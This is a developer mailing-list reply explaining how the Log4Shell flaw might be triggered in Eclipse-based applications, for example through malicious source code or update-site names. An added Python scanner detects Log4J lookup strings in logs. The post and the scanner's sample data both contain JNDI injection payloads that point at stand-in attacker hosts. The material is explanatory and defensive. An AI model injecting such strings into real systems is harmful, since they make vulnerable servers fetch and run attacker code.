Re: [cross-project-issues-dev] log4j vulnerability in Eclipse?
I want to contribute to this discussion my understanding of how an attack
on an Eclipse based application could be performed in practice. My
understanding is mostly based on [1], [2] and [3].
(My understanding is only based on a casual reading of the published
material, and I am by no means an expert in computer security, so
please don't place too much trust in this analysis!)
The Eclipse platform itself doesn't seem to be vulnerable (judging from
earlier messages in this thread) so this might be mostly theoretical,
but might be interesting nevertheless. There might be third party
Eclipse applications that are affected.
My understanding is that this vulnerability affects code that uses user
submitted data in log messages. When messages of the following form are
logged it can make Log4J download and execute arbitrary code:
"${jndi:ldap://attacker.com/a}". Let's call such log messages "bad log
strings".
This is more of a problem for web server applications than for desktop
applications like Eclipse. Web server applications might be attacked if
they log user names or user agent strings. Attackers can actively seek
out and target vulnerable applications.
Desktop applications that act as web clients can also be attacked, but
they probably pose harder targets. Attackers have to somehow trick users
into connecting to malicious services and downloading malicious data.
The following are two situations that I came up with which could
potentially trigger the vulnerability in the Eclipse IDE (if it were
vulnerable, which is probably not the case):
* The user downloads malicious source code and compiles it using
Eclipse. During compilation Eclipse might log some data about the source
code which contains a bad log string.
* The user connects to a malicious software update site. Some data about
the site, for example its name, contains a bad log string. Eclipse logs
this data and triggers the vulnerability.
Again I want to stress the fact that it doesn't seem like the Eclipse
platform itself is vulnerable or distributes any version of Log4J which
is vulnerable.
BR,
Jens Lideström
[1]: https://www.pcmag.com/news/countless-serves-are-vulnerable-to-apache-log4j-zero-day-exploit
[2]: https://www.lunasec.io/docs/blog/log4j-zero-day/
[3]: https://github.com/christophetd/log4shell-vulnerable-app
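As an added example, not part of the original message or of any Eclipse code: a small Python scanner that looks for the "bad log strings" described above in log lines, treating any Log4J `${...}` lookup syntax in a logged user name or update-site name as suspicious and a `jndi:` lookup as the critical case. The log lines are constructed for the demo and `attacker.example` is a placeholder host, not a real indicator.

```python
from typing import Dict, List

# Constructed sample log lines of the kind the post describes: a user name
# and a User-Agent, and an update-site name, logged from untrusted input.
# "attacker.example" and "mirror.example" are placeholders, not real hosts.
SAMPLE_LOG_LINES = [
    'INFO login user=alice ua="Mozilla/5.0 (X11; Linux x86_64)"',
    'INFO login user=${jndi:ldap://attacker.example/a} ua="curl/7.79"',
    'INFO update-site name="Eclipse Releases" url="https://download.eclipse.org/releases/"',
    'WARN update-site name="${date:yyyy} mirror" url="http://mirror.example/"',
]


def extract_lookups(text: str) -> List[str]:
    """Return each balanced, outermost ${...} expression found in text.

    Log4J resolves lookups recursively, so a regex that stops at the first
    '}' would cut nested expressions short; this tracks brace depth instead.
    """
    found: List[str] = []
    depth, start, i = 0, -1, 0
    while i < len(text):
        if text.startswith("${", i):
            if depth == 0:
                start = i
            depth += 1
            i += 2
            continue
        if text[i] == "}" and depth > 0:
            depth -= 1
            if depth == 0:
                found.append(text[start:i + 1])
        i += 1
    return found


def classify_line(line: str) -> Dict[str, object]:
    """Flag a line if it carries lookup syntax; mark JNDI lookups separately."""
    lookups = extract_lookups(line)
    jndi = any("jndi:" in lookup.lower() for lookup in lookups)
    return {"line": line, "lookups": lookups, "jndi": jndi, "suspicious": bool(lookups)}


def scan_log_lines(lines: List[str]) -> List[Dict[str, object]]:
    """Return only the suspicious lines, JNDI hits first (sort is stable)."""
    hits = [h for h in (classify_line(line) for line in lines) if h["suspicious"]]
    return sorted(hits, key=lambda h: not h["jndi"])


if __name__ == "__main__":
    for hit in scan_log_lines(SAMPLE_LOG_LINES):
        print(f"[{'JNDI' if hit['jndi'] else 'lookup'}] {hit['lookups']} <- {hit['line']}")
```

Running it flags the login line with the `jndi:` lookup as critical and the update-site line as merely suspicious, which is the triage split a defender wants when searching existing logs for the patterns in this thread.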